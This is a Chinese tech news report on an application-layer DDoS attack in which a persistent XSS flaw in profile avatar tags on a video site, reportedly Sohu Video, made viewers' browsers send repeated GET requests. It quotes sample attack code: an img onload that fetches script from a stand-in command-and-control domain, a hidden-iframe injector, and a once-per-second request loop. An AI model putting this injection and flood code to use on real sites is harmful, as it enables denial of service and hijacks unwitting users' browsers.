站長之家（Chinaz.com）4月30日消息 昨日，日本CDN服務(wù)商Incapsula撰文，稱其一位用戶遭受了一起特殊的應(yīng)用層DDos攻擊（分布式拒絕服務(wù)攻擊），本次攻擊中黑客使用的是流量劫持技術(shù)。據(jù)統(tǒng)計，共有超過2.2萬的網(wǎng)民通過瀏覽器向該用戶的網(wǎng)站發(fā)起了約為2000萬次的GET請求。這些網(wǎng)民都是在非自愿，甚至不知情的情況下成為“幫兇”的。

Incapsula官方表示不方便透露相關(guān)網(wǎng)站信息，且其技術(shù)團(tuán)隊已在積極需找解決方案，一旦問題得到解決，便會公布更多相關(guān)細(xì)節(jié)。而據(jù)白帽子技術(shù)社區(qū)的相關(guān)信息顯示，本次攻擊事件中被利用的那個網(wǎng)站便是全球網(wǎng)站流量排名27的搜狐視頻。

此外，Incapsula在官博中也對黑客攻擊所使用的技術(shù)進(jìn)行了解說，大致如下：

在此次攻擊事件中，黑客利用持久性XSS漏洞，通過個人資料中的頭像設(shè)置在標(biāo)簽中注入了JS代碼。這樣一來，該圖片每被使用一次，相關(guān)惡意代碼便會傳染一次，任何用戶訪問上述頁面，都會自動執(zhí)行被惡意注入的JS代碼，從而觸發(fā)了隱藏的

示例代碼：

// JavaScript Injection in <img> tag enabled by Persistent XSS

<img src="/imagename.jpg" onload="$.getScript('https://c&cdomain.com/index.html')" />

// Malicious JavaScript opens hidden <iframe>

function ddos(url) {

$("body").append("<iframe id='ifr11323' style='display:none;' src='https://c&cdomain.com/index.html'></iframe>"); }

// Ajax DDoS tool in executes GET request every second

<html><body>

<h1>Iframe</h1>

<script>

ddos('https://upload.chinaz.com//', 'https://upload.chinaz.com/2014/0430/1398849165905.jpg');

function ddos(url,url2){

window.setInterval(function (){

$.getScript(url);

$.getScript(url2);

},1000)

}

</script>

</body></html>

被“控制”的用戶每秒都會向受害人的網(wǎng)站發(fā)起一次請求。每秒一次看似沒有多大影響，但如果一段視頻30分鐘來說，每個用戶在看視頻時都會發(fā)出1800次的請求，試想若是有成千上萬的用戶在觀看視頻的話，會如何呢？

（舉報）